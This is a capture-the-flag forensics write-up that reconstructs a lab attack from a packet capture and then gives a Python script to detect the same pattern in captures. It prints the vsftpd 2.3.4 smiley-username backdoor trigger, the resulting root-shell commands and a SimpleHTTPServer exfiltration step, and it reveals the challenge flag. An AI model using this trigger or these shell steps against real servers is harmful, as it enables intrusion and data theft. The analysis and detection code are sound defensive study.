Boarding of the Black Pearl - Forensics
Points: 50 | Flag: BCCTF{b1@ckp3@r1_10$t_1t$_tr3@$ur3} | Solved by: Smothy @ 0xN1umb

what we got
a single pcap file blackpearl_vs_royalnavy.pcap - network capture from the "raid" on the Black Pearl. classic forensics stuff, lets dig in
the solve
opened it up with tshark and immediately saw the protocol hierarchy - we got TCP with FTP, SSH, Telnet, SMTP, HTTP, and some raw data streams. interesting mix
```
frame
  eth
    ip
      tcp
        ssh, telnet, ftp, smtp, data, http
```
first thing that jumps out - there's a port scan at the beginning. attacker on 172.16.40.16 scanning 172.16.40.17 ports 1-50. finds SSH (22), Telnet (23), FTP (21), and SMTP (25) open
then the juicy part. attacker connects to FTP and we see:
```
220 (vsFTPd 2.3.4)
USER GjmxtQ:)
331 Please specify the password.
PASS 5m
```
vsFTPd 2.3.4 with a username ending in :) - if you know, you know lmao. that's the infamous vsftpd backdoor: a USER string containing the smiley :) makes the backdoored 2.3.4 build open a root shell listener on port 6200, no password needed. classic metasploitable moment

sure enough, right after the FTP login attempt, there's a connection to port 6200 that succeeds. following that TCP stream reveals the whole shell session:
```
id
uid=0(root) gid=0(root)
whoami
root
cd home
ls
ftp msfadmin service user
cd msfadmin
ls
treasure vulnerable
cd treasure
ls
map.b64
python -m SimpleHTTPServer 8080
```
attacker got root, navigated to /home/msfadmin/treasure/, found map.b64, and spun up a python http server on the victim to exfil it. ngl that's exactly what i would've done too
then we see the HTTP request:
```
GET /map.b64 HTTP/1.1
```
extracted the file from the HTTP response (tshark --export-objects ftw):
```
QkNDVEZ7YjFAY2twM0ByMV8xMCR0XzF0JF90cjNAJHVyM30K
```
thats base64. decode it and...
```
$ echo "QkNDVEZ7YjFAY2twM0ByMV8xMCR0XzF0JF90cjNAJHVyM30K" | base64 -d
BCCTF{b1@ckp3@r1_10$t_1t$_tr3@$ur3}
```
boom. blackpearl lost its treasure fr
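the three things that made this capture readable - the port sweep, the :) login followed by a hit on 6200, and an HTTP body that base64-decodes to a flag - are exactly the kind of checks you'd want automated if you were triaging a pile of pcaps instead of one. below is an added example of that triage logic (my own code, not the challenge's or any tshark built-in). it runs over constructed flow tuples shaped like `tshark -T fields` output (time, src, dst, dstport, syn-only flag, payload); the hosts, banner, username and base64 blob come from the writeup above, while the timings and the 51234/51235 ephemeral ports are made up for the sample:

```python
import base64
import re
from collections import defaultdict

# Constructed flow records standing in for `tshark -T fields` output from the capture.
# Each tuple: (time_relative, ip.src, ip.dst, tcp.dstport, is_syn_only, payload_bytes)
# Hosts, banner, smiley username and base64 blob are from the writeup; timings and
# ephemeral ports (51234/51235) are invented for the sample.
ATTACKER, VICTIM = "172.16.40.16", "172.16.40.17"
SAMPLE_FLOWS = [
    # sweep of ports 1-50 from attacker to victim
    *[(0.001 * p, ATTACKER, VICTIM, p, True, b"") for p in range(1, 51)],
    (1.0, VICTIM, ATTACKER, 51234, False, b"220 (vsFTPd 2.3.4)\r\n"),
    (1.1, ATTACKER, VICTIM, 21, False, b"USER GjmxtQ:)\r\n"),
    (1.2, ATTACKER, VICTIM, 21, False, b"PASS 5m\r\n"),
    (1.5, ATTACKER, VICTIM, 6200, True, b""),          # backdoor listener answers
    (2.0, ATTACKER, VICTIM, 6200, False, b"id\n"),
    (5.0, ATTACKER, VICTIM, 8080, True, b""),          # SimpleHTTPServer on the victim
    (5.1, ATTACKER, VICTIM, 8080, False,
     b"GET /map.b64 HTTP/1.1\r\nHost: 172.16.40.17:8080\r\n\r\n"),
    (5.2, VICTIM, ATTACKER, 51235, False,
     b"HTTP/1.0 200 OK\r\nContent-type: application/octet-stream\r\n\r\n"
     b"QkNDVEZ7YjFAY2twM0ByMV8xMCR0XzF0JF90cjNAJHVyM30K"),
]

SMILEY_USER = re.compile(rb"^USER\s.*:\)")   # the vsftpd 2.3.4 backdoor trigger
FLAG_RE = re.compile(r"BCCTF\{[^}]*\}")


def find_port_scans(flows, threshold=20, window=1.0):
    """Return (src, dst, distinct_ports) for pairs where one host SYN'd >= threshold
    distinct ports within `window` seconds (a sliding window over SYN-only packets)."""
    syns = defaultdict(list)
    for t, src, dst, dport, syn, _ in flows:
        if syn:
            syns[(src, dst)].append((t, dport))
    hits = []
    for (src, dst), events in syns.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ports = {p for t, p in events[i:] if t - t0 <= window}
            if len(ports) >= threshold:
                hits.append((src, dst, len(ports)))
                break
    return hits


def find_vsftpd_backdoor(flows, followup_window=30.0):
    """Flag a ':)' FTP username on port 21 that is followed, from the same client to the
    same server, by a SYN to 6200 - the backdoor's root-shell port."""
    trigger = {}
    findings = []
    for t, src, dst, dport, syn, payload in flows:
        if dport == 21 and SMILEY_USER.match(payload.strip()):
            trigger[(src, dst)] = t
        elif dport == 6200 and syn and (src, dst) in trigger \
                and t - trigger[(src, dst)] <= followup_window:
            findings.append({"attacker": src, "victim": dst,
                             "trigger_at": trigger[(src, dst)], "shell_at": t})
    return findings


def decode_http_body(payload):
    """Split an HTTP *response* into head/body and base64-decode the body.
    Returns None for requests, non-HTTP payloads or bodies that are not valid base64."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep or not head.startswith(b"HTTP/"):
        return None
    try:
        return base64.b64decode(body.strip(), validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return None


def find_exfil(flows):
    """Report every HTTP response whose decoded body contains a flag-shaped string."""
    found = []
    for t, src, dst, _dport, _syn, payload in flows:
        decoded = decode_http_body(payload)
        if decoded is None:
            continue
        m = FLAG_RE.search(decoded.decode("utf-8", errors="replace"))
        if m:
            found.append({"server": src, "client": dst, "at": t, "flag": m.group(0)})
    return found


def triage(flows):
    """One-shot timeline summary, in the order the attack unfolded in the capture."""
    return {"scans": find_port_scans(flows),
            "backdoor": find_vsftpd_backdoor(flows),
            "exfil": find_exfil(flows)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_FLOWS).items():
        print(f"{key}: {value}")
```

feeding real captures in is just a matter of replacing SAMPLE_FLOWS with parsed `tshark -T fields -e frame.time_relative -e ip.src -e ip.dst -e tcp.dstport -e tcp.flags -e tcp.payload` lines; the three detectors are independent, so a pcap with only the sweep or only the 6200 hit still gets the right partial verdict.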
flag
BCCTF{b1@ckp3@r1_10$t_1t$_tr3@$ur3}
smothy out ✌️